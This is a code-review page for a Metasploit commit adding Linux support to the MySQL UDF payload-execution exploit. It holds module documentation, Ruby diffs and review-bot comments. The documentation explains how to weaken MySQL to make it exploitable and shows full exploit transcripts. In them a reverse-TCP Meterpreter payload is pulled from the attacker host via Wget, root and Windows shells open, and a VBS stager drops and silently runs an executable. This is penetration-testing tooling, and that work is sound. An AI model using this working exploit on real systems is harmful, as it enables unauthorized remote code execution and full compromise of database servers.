Land #9170, Linux UDF for mysql_udf_payload

MS-2855/keylogger-mettle-extension
William Vu 2017-12-21 20:48:24 -06:00
commit caae33b417
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
5 changed files with 206 additions and 10 deletions

Binary file not shown.

Binary file not shown.


@ -0,0 +1,175 @@
## Vulnerable Application
This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder.
The file is then loaded by mysql, and arbitrary commands can be run. There are several caveats for this to
function however, including:
1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing
to mysql's plugins folder
2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled. Equivalents on other linux systems most likely need the same
3. the mysql folder must be writable
### Linux (Ubuntu 16.04 x64) Configuration
In this configuration, we'll run mysql as root so we have a priv escalate.
1. Edit `/lib/systemd/system/mysql.service` and set `User=root`
2. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`. After the `[mysqld]` section, change `user=mysql` to `user=root`
3. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`. After the `[mysqld]` section, add `secure_file_priv=""`
4. Disable app-armor for mysql: `sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld`
5. Restart mysql service: `sudo systemctl restart mysql.service`
If you need to make the root user accessible remotely
```
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
FLUSH PRIVILEGES;
```
or
```
update user set host='%' where host='127.0.0.1';
```
### Windows (Server 2012 x64) Configuration
One good reference for these instructions is [PR #5334](https://github.com/rapid7/metasploit-framework/pull/5334)
1. Download and install mysql installer
2. Install dependencies including, at the time of writing, Visual C++ 2013 Redistributable Package.
3. Edit `C:\ProgramData\MySQL\MySQL Server\MySQL Server *\my.ini` and change the value of `secure-file-priv=` to `""`
4. Make the `C:\Program Files\MySQL\MySQL Server *\lib\plugin` folder permissions writable by the MySQL (service) user.
If you need to make the root user accessible remotely
```
GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
FLUSH PRIVILEGES;
```
or
```
update user set host='%' where host='127.0.0.1';
```
## Verification Steps
1. Install MySQL and make it vulnerable as described above
2. Start msfconsole
3. Do: ```use exploit/multi/mysql/mysql_udf_payload```
4. Do: ```set rhost [ip]```
5. Do: ```set srvhost [ip]```
6. Make sure target and payload are correct
7. Set mysql login information
8. Do: ```exploit```
9. You should get a shell.
## Options
**FORCE_UDF_UPLOAD**
This option will force the uploading of a UDF dll/so file even if one exists which has a system call already
## Scenarios
### Ubuntu 16.04 with MySQL 5.7.20
In this case, the service has been configured as noted in the first section of this document, a remotely accessible MySQL running as root.
```
[*] Processing udf.rc for ERB directives.
resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
resource (udf.rc)> set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
resource (udf.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (udf.rc)> set rhost 2.2.2.2
rhost => 2.2.2.2
resource (udf.rc)> set srvhost 1.1.1.1
srvhost => 1.1.1.1
resource (udf.rc)> set srvport 64423
srvport => 64423
resource (udf.rc)> set password wordpress
password => wordpress
resource (udf.rc)> set target 1
target => 1
resource (udf.rc)> set verbose true
verbose => true
msf exploit(mysql_udf_payload) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 2.2.2.2:3306 - Checking target architecture...
[*] 2.2.2.2:3306 - Checking for sys_exec()...
[*] 2.2.2.2:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 2.2.2.2:3306 - Using URL: http://1.1.1.1:64423/YMDYyVp1fG
[*] 2.2.2.2:3306 - Client 2.2.2.2 (Wget/1.17.1 (linux-gnu)) requested /YMDYyVp1fG
[*] 2.2.2.2:3306 - Sending payload to 2.2.2.2 (Wget/1.17.1 (linux-gnu))
[*] Transmitting intermediate stager...(106 bytes)
[*] Sending stage (826872 bytes) to 2.2.2.2
[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46330) at 2017-10-30 23:22:08 -0400
[-] 2.2.2.2:3306 - Exploit failed: Rex::StreamClosedError Stream #<Socket:0x00561e7e1758e8> is closed.
[*] 2.2.2.2:3306 - Server stopped.
[*] Exploit completed, but no session was created.
msf exploit(mysql_udf_payload) > sessions -i 4
[*] Starting interaction with 4...
meterpreter > sysinfo
Computer : 2.2.2.2
OS : (Linux 4.4.0-98-generic)
Architecture : x64
Meterpreter : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
### Windows Server 2012 with MySQL 5.7.20
```
[*] Processing udf.rc for ERB directives.
resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
resource (udf.rc)> set lhost 1.1.1.1
lhost => 1.1.1.1
resource (udf.rc)> set srvhost 1.1.1.1
srvhost => 1.1.1.1
resource (udf.rc)> set srvport 64423
srvport => 64423
resource (udf.rc)> set verbose true
verbose => true
msf exploit(mysql_udf_payload) > set target 0
target => 0
msf exploit(mysql_udf_payload) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(mysql_udf_payload) > set rhost 3.3.3.3
rhost => 3.3.3.3
msf exploit(mysql_udf_payload) > set password mysql
password => mysql
msf exploit(mysql_udf_payload) > exploit
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] 3.3.3.3:3306 - Checking target architecture...
[*] 3.3.3.3:3306 - Checking for sys_exec()...
[*] 3.3.3.3:3306 - Checking target architecture...
[*] 3.3.3.3:3306 - Checking for MySQL plugin directory...
[*] 3.3.3.3:3306 - Target arch (win64) and target path both okay.
[*] 3.3.3.3:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/jfAzUfJP.dll...
[*] 3.3.3.3:3306 - Checking for sys_exec()...
[*] 3.3.3.3:3306 - Executing: echo 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>>%TEMP%\EkEiJ.b64
[*] 3.3.3.3:3306 - Command Stager progress - 1.47% done (1499/102246 bytes)
```
...snip...
```
[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
[*] 3.3.3.3:3306 - Command Stager progress - 96.76% done (98934/102246 bytes)
[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\EkEiJ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\GTKoi.vbs & echo Set file = fs.GetFile("%TEMP%\EkEiJ.b64") >>%TEMP%\GTKoi.vbs & echo If file.Size Then >>%TEMP%\GTKoi.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\EkEiJ.b64", 1) >>%TEMP%\GTKoi.vbs & echo data = fd.ReadAll >>%TEMP%\GTKoi.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\GTKoi.vbs & echo data = base64_decode(data) >>%TEMP%\GTKoi.vbs & echo fd.Close >>%TEMP%\GTKoi.vbs
[*] 3.3.3.3:3306 - Command Stager progress - 98.19% done (100400/102246 bytes)
[*] 3.3.3.3:3306 - Executing: echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\CVVsw.exe", 2, True) >>%TEMP%\GTKoi.vbs & echo ofs.Write data >>%TEMP%\GTKoi.vbs & echo ofs.close >>%TEMP%\GTKoi.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\GTKoi.vbs & echo shell.run "%TEMP%\CVVsw.exe", 0, false >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\GTKoi.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\GTKoi.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\GTKoi.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\GTKoi.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\GTKoi.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\GTKoi.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\GTKoi.vbs & echo If Not w2 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w3 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w4 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\GTKoi.vbs & echo Next >>%TEMP%\GTKoi.vbs & echo base64_decode = strOut >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\GTKoi.vbs
[*] 3.3.3.3:3306 - Command Stager progress - 99.59% done (101827/102246 bytes)
[*] 3.3.3.3:3306 - Executing: echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\GTKoi.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\GTKoi.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & cscript //nologo %TEMP%\GTKoi.vbs
[*] 3.3.3.3:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Sending stage (179267 bytes) to 3.3.3.3
[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 3.3.3.3:49165) at 2017-11-02 23:12:07 -0400
meterpreter > sysinfo
Computer : WIN-OBKF2JFCDKL
OS : Windows 2012 (Build 9200).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
```
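Review bot: a few corrections are needed in the new doc before landing. "expoits" in the first sentence should be "exploits"; Linux steps 2 and 3 should say the setting goes under the `[mysqld]` section rather than "after" it; and the unqualified `update user set host='%' where host='127.0.0.1';` assumes the `mysql` database is selected and rewrites every account bound to that host, so scope it (`UPDATE mysql.user SET host='%' WHERE user='root';`). In the Ubuntu scenario the transcript also shows `Exploit failed: Rex::StreamClosedError` and `Exploit completed, but no session was created.` immediately after session 4 was opened; either say in the doc that the session is still usable via `sessions -i`, or handle the closed stream in the module so a successful run is not reported as a failure.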


@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL
binname = Rex::Text.rand_text_alpha(8) binname = Rex::Text.rand_text_alpha(8)
binpath = tmpdir << binname binpath = tmpdir << binname
print_status "Uploading binary as #{binpath}..." print_status "Uploading binary as #{binpath}..."
print_status "SELECT #{blob} into DUMPFILE '#{binpath}'"
res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'") res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'")
return res return res
end end
def mysql_upload_sys_udf(arch=:win32,target_path=nil) def mysql_upload_sys_udf(arch=:win32,target_path=nil)
fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll") case arch
when :win32
fname = 'lib_mysqludf_sys_32.dll'
when :win64
fname = 'lib_mysqludf_sys_64.dll'
when :linux32
fname = 'lib_mysqludf_sys_32.so'
when :linux64
fname = 'lib_mysqludf_sys_64.so'
end
sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname ) sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname )
data = File.open(sys_dll, "rb") {|f| f.read f.stat.size} data = File.open(sys_dll, "rb") {|f| f.read f.stat.size}
blob = "0x" blob = "0x"
blob << data.unpack("C*").map {|x| "%02x" % [x]}.join blob << data.unpack("C*").map {|x| "%02x" % [x]}.join
dll_name = Rex::Text.rand_text_alpha(8) dll_name = Rex::Text.rand_text_alpha(8)
target_dll = target_path << dll_name << ".dll" [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'
target_dll = target_path << dll_name << extension
print_status "Uploading #{fname} library to #{target_dll}..." print_status "Uploading #{fname} library to #{target_dll}..."
mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'") mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'")
return dll_name << ".dll" return dll_name << extension
end end
def mysql_drop_and_create_sys_exec(soname) def mysql_drop_and_create_sys_exec(soname)
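Review bot: the new `case arch` in `mysql_upload_sys_udf` has no `else` branch, so for any value outside the four listed (including the `:unknown` that `mysql_get_arch` can return) `fname` is nil and `File.join(Msf::Config.data_directory, "exploits", "mysql", fname)` raises a TypeError instead of the method returning nil. Add `else return nil` (or a `fail_with`) there. The ternary-with-assignment `[:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so'` should be written as `extension = [:win32, :win64].include?(arch) ? '.dll' : '.so'`, which is the idiomatic form.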
@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL
:win64 :win64
when /Win32/i when /Win32/i
:win32 :win32
when /Linux/i
# we need a second query to determine bits
res = mysql_get_variable("@@version_compile_machine")
return :unknown unless res
if res =~ /x86_64/i
:linux64
else
:linux32
end
else else
res res
end end
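Review bot: the Linux branch maps every `@@version_compile_machine` value that is not `x86_64` to `:linux32`, so an aarch64 or other non-x86 build is reported as 32-bit x86 and the module will upload `lib_mysqludf_sys_32.so`, which that server cannot load. Match `i[3-6]86` explicitly for `:linux32` and fall through to `:unknown` otherwise, mirroring the explicit `/Win64/` and `/Win32/` matches above it.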
@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL
def mysql_add_sys_exec def mysql_add_sys_exec
arch = mysql_get_arch arch = mysql_get_arch
case arch case arch
when :win64,:win32 when :win64,:win32,:linux64,:linux32
target_path = mysql_get_plugin_dir target_path = mysql_get_plugin_dir
if target_path if target_path
print_status "Target arch (#{arch}) and target path both okay." print_status "Target arch (#{arch}) and target path both okay."


@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote
super( super(
update_info( update_info(
info, info,
'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution', 'Name' => 'Oracle MySQL UDF Payload Execution',
'Description' => %q{ 'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the This module creates and enables a custom UDF (user defined function) on the
target host via the SELECT ... into DUMPFILE method of binary injection. On target host via the SELECT ... into DUMPFILE method of binary injection. On
@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries 'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
'todb' # this Metasploit module 'todb', # this Metasploit module
'h00die' # linux addition
], ],
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'References' => 'References' =>
@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote
# Bernardo's work with cmd exec via udf # Bernardo's work with cmd exec via udf
[ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ] [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
], ],
'Platform' => 'win', 'Platform' => ['win', 'linux'],
'Targets' => 'Targets' =>
[ [
[ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit) [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
[ 'Linux', {'CmdStagerFlavor' => 'wget' } ]
], ],
'CmdStagerFlavor' => 'vbs',
'DefaultTarget' => 0, 'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post. 'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post.
)) ))
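Review bot: dropping the `Automatic` target means the module no longer picks the stager from the detected platform. `DefaultTarget` 0 is now `Windows`, so a run against a Linux server with the default target uses the `vbs` `CmdStagerFlavor`, and the operator has to remember `set target 1` (as the Ubuntu scenario in the doc does). Since `mysql_get_arch` already distinguishes `:win*` from `:linux*`, keep an `Automatic` target that selects the flavor from that result, or at least have the module refuse to continue when the chosen target does not match the detected arch. The `# Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)` comment now sits on the Windows target only; say whether those confirmations were on Windows.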
@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote
if not m if not m
return return
elsif not [:win32,:win64].include?(@mysql_arch) elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch)
print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'") print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
return return
else else
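Review bot: the supported-architecture list `[:win32,:win64,:linux64,:linux32]` is now spelled out here and again in the mixin's `mysql_add_sys_exec` (`when :win64,:win32,:linux64,:linux32`); define it once in the mixin (a constant such as `SUPPORTED_ARCHES`, hypothetical name) so the next platform addition cannot update one list and miss the other. The incompatible-architecture message should also be `print_error` rather than `print_status`, since the module returns without exploiting at that point.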